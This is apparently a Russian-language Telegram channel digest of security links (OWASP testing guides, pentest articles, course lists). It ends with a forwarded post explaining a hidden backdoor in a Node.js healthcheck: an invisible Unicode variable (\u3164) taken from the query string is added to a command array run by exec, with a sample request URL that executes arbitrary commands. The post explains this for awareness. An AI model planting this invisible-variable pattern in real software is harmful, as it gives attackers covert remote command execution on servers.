Множество статей по теме Web Penetration Testing
https://www.hackingarticles.in/web-penetration-testing/
На самом сайте https://www.hackingarticles.in/ можно посмотреть и другие статьи по темам таких как CTF Challenges, Penetration Testing, Red Teaming
https://www.hackingarticles.in/web-penetration-testing/
На самом сайте https://www.hackingarticles.in/ можно посмотреть и другие статьи по темам таких как CTF Challenges, Penetration Testing, Red Teaming
Hacking Articles
Web Penetration Testing
Elevate your skills in Web Application Penetration Testing through our comprehensive coverage of tools and methodologies.
Forwarded from @Leakinfo
Ценообразование на пентест - услуги или «Как не платить за воздух?»
https://telegra.ph/Cenoobrazovanie-na-pentest---uslugi-ili-Kak-ne-platit-za-vozduh-11-18
#pentest #infosec #новости #пентест #услуги #оплата #цены
https://telegra.ph/Cenoobrazovanie-na-pentest---uslugi-ili-Kak-ne-platit-za-vozduh-11-18
#pentest #infosec #новости #пентест #услуги #оплата #цены
Telegraph
Ценообразование на пентест - услуги или «Как не платить за воздух?»
— Вагончик? Вообще не наш профиль... Ради нескольких дней работы и трёх копеек заезжать на объект? Ну его... Напиши пол ляма, чтобы либо сам отстал, либо реальный выхлоп был! — Пол ляма? Что-то совсем жирно... Напишу 400. Проблематика На перенасыщенном, но…
OWASP Web Security Testing Guide
https://owasp.org/www-project-web-security-testing-guide/
https://owasp.org/www-project-web-security-testing-guide/
owasp.org
OWASP Web Security Testing Guide | OWASP Foundation
The Web Security Testing Guide (WSTG) Project produces the premier cybersecurity testing resource for web application developers and security professionals.
OWASP Mobile Security Testing Guide
https://owasp.org/www-project-mobile-security-testing-guide/
https://owasp.org/www-project-mobile-security-testing-guide/
owasp.org
OWASP Mobile Application Security | OWASP Foundation
The OWASP Mobile Application Security (MAS) project consists of a series of documents that establish a security and privacy standard for mobile apps and a comprehensive testing guide that covers the processes, techniques, and tools used during a mobile application…
Forwarded from TechRocks
Привет, друзья! Сегодня наша подборка статей - о хакинге.
- Этичный хакинг: ТОП-20 лучших сайтов для практики
Читать статью
- 10 лучших дистрибутивов для хакинга и пентеста
Читать статью
- 10 курсов по этичному хакингу для начинающих и продолжающих
Читать статью
- Этичный хакинг: ТОП-20 лучших сайтов для практики
Читать статью
- 10 лучших дистрибутивов для хакинга и пентеста
Читать статью
- 10 курсов по этичному хакингу для начинающих и продолжающих
Читать статью
Forwarded from @Leakinfo
Бесплатные инструменты для защиты Open Source
https://telegra.ph/Besplatnye-instrumenty-dlya-zashchity-Open-Source-11-19
#soft #безопасность #защита #инструменты #бесплатно
https://telegra.ph/Besplatnye-instrumenty-dlya-zashchity-Open-Source-11-19
#soft #безопасность #защита #инструменты #бесплатно
Telegraph
Бесплатные инструменты для защиты Open Source
Цель OWASP состоит в том, чтобы помочь всему миру улучшить безопасность своего программного обеспечения. Одним из способов, как можно это сделать, является оказание постоянной поддержки разработчикам Open Source и совершенствование их программного обеспечения…
Forwarded from LeakInfo
Интересный и относительно новый способ бэкдоринга с использованием Unicode символов.
Присмотритесь к исходному коду - видите ли вы что-нибудь подозрительное? На скриншоте - скрипт простейшего хелсчека, который визуально выглядит безобидно, и выполняет функцию проверки работоспособности сети.
Но это только на первый взгляд. Начиная с ECMAScript 2015, все символы Unicode со свойством ID_Start могут быть использованы в коде в качестве имен переменных.
Символ под названием «HANGUL FILLER» (который, к слову, если указать в качестве ника в TG, становится некликабельным при пересылке) относится к категории «Letter, other» и является визуально невидимым, но при этом имеет свойство ID_Start и может быть использован в коде в качестве имен переменных.
Снова обратимся к коду, заменив HANGUL его escape-последовательностью:
Присмотритесь к исходному коду - видите ли вы что-нибудь подозрительное? На скриншоте - скрипт простейшего хелсчека, который визуально выглядит безобидно, и выполняет функцию проверки работоспособности сети.
Но это только на первый взгляд. Начиная с ECMAScript 2015, все символы Unicode со свойством ID_Start могут быть использованы в коде в качестве имен переменных.
Символ под названием «HANGUL FILLER» (который, к слову, если указать в качестве ника в TG, становится некликабельным при пересылке) относится к категории «Letter, other» и является визуально невидимым, но при этом имеет свойство ID_Start и может быть использован в коде в качестве имен переменных.
Снова обратимся к коду, заменив HANGUL его escape-последовательностью:
const { timeout,\u3164 } = req.query;
Параметр timeout, который мы, используя деструктуризацию, извлекаем из req.query, не является единственным. Передав в запросе, в качестве параметра, HANGUL FILLER или любой, аналогичный ему символ (например, ZERO WITH SPACE), мы присвоим его в отдельную невидимую переменную, которую мы позже поместим в массив.const checkCommands = [
'ping -c 1 google.com',
'curl -s http://example.com/',\u3164
];
Далее каждый элемент массива попадает в функцию exec, которая, в свою очередь, выполняет переданные ей команды в шелле. Остается только передать url-encode HANGUL в качестве параметра к нашему эндпоинту и в качестве значения - команду, которую мы выполним в системеhttp://host:8080/network_health?%E3%85%A4=<command>
Огромный плюс данного подхода в том, что, кроме того, что он не виден на первый взгляд, он не виден также и при выделении текста. Даже IDE не подсвечивают и не раскрашивают такие Unicode символы, проиндексировав исходники.